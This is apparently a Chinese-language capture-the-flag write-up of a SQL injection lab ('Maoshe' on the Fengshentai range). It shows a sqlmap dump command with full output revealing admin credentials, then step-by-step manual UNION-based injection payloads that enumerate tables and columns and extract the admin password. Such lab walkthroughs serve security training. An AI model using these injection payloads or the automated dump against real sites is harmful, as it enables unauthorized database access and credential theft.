封神臺 SQL隱碼攻擊 靶場 (貓舍)手動注入
靶場地址 http://pu2lh35s.ia.aqlab.cn/?id=1
使用指令碼
- 可以直接使用sqlmap指令碼 直接 對這個地址進行測試 不過這樣實在是太沒意思了
- 這裡使用的是 sqlmap 二次開發的 sqlmapplus 指令碼 sqlmap 也是一樣的
sqlmapX -u "http://pu2lh35s.ia.aqlab.cn/?id=1" -D "maoshe" --dump --batch --random-agent
___
__H__
___ ___["]_____ ___ ___ {1.8#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:46:16 /2024-10-12/
[20:46:16] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12' from file '/home/kali/tools/SqlmapXPlus/data/txt/user-agents.txt'
[20:46:17] [INFO] resuming back-end DBMS 'mysql'
[20:46:17] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 8425=8425
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 3539 FROM (SELECT(SLEEP(5)))tWAV)
---
[20:46:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0.12
[20:46:17] [INFO] fetching tables for database: 'maoshe'
[20:46:17] [INFO] fetching number of tables for database 'maoshe'
[20:46:17] [INFO] resumed: 4
[20:46:17] [INFO] resumed: admin
[20:46:17] [INFO] resumed: dirs
[20:46:17] [INFO] resumed: news
[20:46:17] [INFO] resumed: xss
[20:46:17] [INFO] fetching columns for table 'admin' in database 'maoshe'
[20:46:17] [INFO] resumed: 3
[20:46:17] [INFO] resumed: Id
[20:46:17] [INFO] resumed: username
[20:46:17] [INFO] resumed: password
[20:46:17] [INFO] fetching entries for table 'admin' in database 'maoshe'
[20:46:17] [INFO] fetching number of entries for table 'admin' in database 'maoshe'
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: 1
[20:46:17] [INFO] resumed: hellohack
[20:46:17] [INFO] resumed: admin
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: zkaqbanban
[20:46:17] [INFO] resumed: ppt
Database: maoshe
Table: admin
[2 entries]
+----+------------+----------+
| Id | password | username |
+----+------------+----------+
| 1 | hellohack | admin | ## 這裡已經發現了 flag
| 2 | zkaqbanban | ppt |
+----+------------+----------+
[20:46:17] [INFO] table 'maoshe.`admin`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/admin.csv'
[20:46:17] [INFO] fetching columns for table 'xss' in database 'maoshe'
[20:46:17] [INFO] resumed: 3
[20:46:17] [INFO] resumed: id
[20:46:17] [INFO] resumed: user
[20:46:17] [INFO] resumed: pass
[20:46:17] [INFO] fetching entries for table 'xss' in database 'maoshe'
[20:46:17] [INFO] fetching number of entries for table 'xss' in database 'maoshe'
[20:46:17] [INFO] resumed: 0
[20:46:17] [WARNING] table 'xss' in database 'maoshe' appears to be empty
Database: maoshe
Table: xss
[0 entries]
+----+------+--------+
| id | pass | user |
+----+------+--------+
+----+------+--------+
[20:46:17] [INFO] table 'maoshe.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/xss.csv'
[20:46:17] [INFO] fetching columns for table 'news' in database 'maoshe'
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: id
[20:46:17] [INFO] resumed: content
[20:46:17] [INFO] fetching entries for table 'news' in database 'maoshe'
[20:46:17] [INFO] fetching number of entries for table 'news' in database 'maoshe'
[20:46:17] [INFO] resumed: 3
[20:46:17] [INFO] resumed: <div class="spacer"></div><div class="item"><div class="title">
[20:46:17] [INFO] resumed: 1
[20:46:17] [INFO] resumed: <h1>
[20:46:17] [INFO] resumed: 2
[20:46:17] [INFO] resumed: <h1>
[20:46:17] [INFO] resumed: 3
Database: maoshe
Table: news
[3 entries]
+----+-----------------------------------------------------------------+
| id | content |
+----+-----------------------------------------------------------------+
| 1 | <div class="spacer"></div><div class="item"><div class="title"> |
| 2 | <h1> |
| 3 | <h1> |
+----+-----------------------------------------------------------------+
[20:46:18] [INFO] table 'maoshe.news' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/news.csv'
[20:46:18] [INFO] fetching columns for table 'dirs' in database 'maoshe'
[20:46:18] [INFO] resumed: 1
[20:46:18] [INFO] resumed: paths
[20:46:18] [INFO] fetching entries for table 'dirs' in database 'maoshe'
[20:46:18] [INFO] fetching number of entries for table 'dirs' in database 'maoshe'
[20:46:18] [INFO] resumed: 0
[20:46:18] [WARNING] table 'dirs' in database 'maoshe' appears to be empty
Database: maoshe
Table: dirs
[0 entries]
+-------+
| paths |
+-------+
+-------+
[20:46:18] [INFO] table 'maoshe.dirs' dumped to CSV file '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn/dump/maoshe/dirs.csv'
[20:46:18] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/pu2lh35s.ia.aqlab.cn'
[*] ending @ 20:46:18 /2024-10-12/
手動注入
判斷是否存在 SQL隱碼攻擊漏洞
- 構造and 1=1,這個語句是恆成立的,一般頁面都是不報錯的
- 嘗試 1=2
- 這裡報錯了 說明存在 注入漏洞
使用 order by 語句 判斷資料庫欄位數
- 構造
?id=1 and 1=1 order by 1
頁面沒有變化(order by 1表示根據第一列來排序,一般也是如此預設升序的) - 再來依次構造order by 2 / order by 3
- 由MySQL的語法有,order by後面的資料超過列數後將會報錯,因此用種方法來判斷一共有幾個欄位
- order by 1/order by 2 都沒有任何問題 但是 order by 3 報錯了
使用聯合查詢判斷回顯點
- 回顯點就是在頁面中能顯示資料庫資訊的板塊,比如有的網頁中“瀏覽次數”“釋出時間”等,都反應的是資料庫中的資料
- 在MySQL語句中,頁面一次只能顯示一行查詢的內容,而且是先查後顯示,於是我們需要讓前面的語句?id=1 and 1=1這句話失效,從而顯示
union select 1,2
的內容 - 因此我們讓前一個命令報錯無法顯示,即構造?id=1 and 1=2,後面照常
union select 1,2
使用回顯點 查詢相關的資料
- 查詢當前資料庫的名稱
- 已知2為回顯點,我們只需要在聯合查詢時將2替代為我們想要查詢到部位名稱即可
- 可以查詢當前的資料庫名,將2替換為database()
- 構造id=1 and 1=2 union select 1,database()
- 資料庫名為maoshe
- 查詢資料庫中的表名
- 構造
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
- limit 0,1的意思是從0開始,查詢第1個資料
- 只要修改後面的 limit 0,1 /limit 1,1/limit 2,1 就可以看到後面的表名了
- 說明後面 的資料庫的表 分別是 admin dirs news xss
- 而當後面是 limit 4,1 的時候 就是空白的 說明只有四張表 而管理員的資訊一般都存在 admin 中
- 查詢admin表的列名
- 構造
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
- 同樣 修改後面的 limit 0,1 就可以看到 後面的列名 第一列是 id 第二列是 username 第三列 則是password
- 現在所有的資訊都找到了 直接查詢就可以了
- 查詢需要的資訊
- 構造
?id=1 and 1=2 union select 1,username from admin
- 構造
?id=1 and 1=2 union select 1,password from admin where username = 'admin'
結束
- Flag 已經找到了 也就是 管理員的密碼 hellohack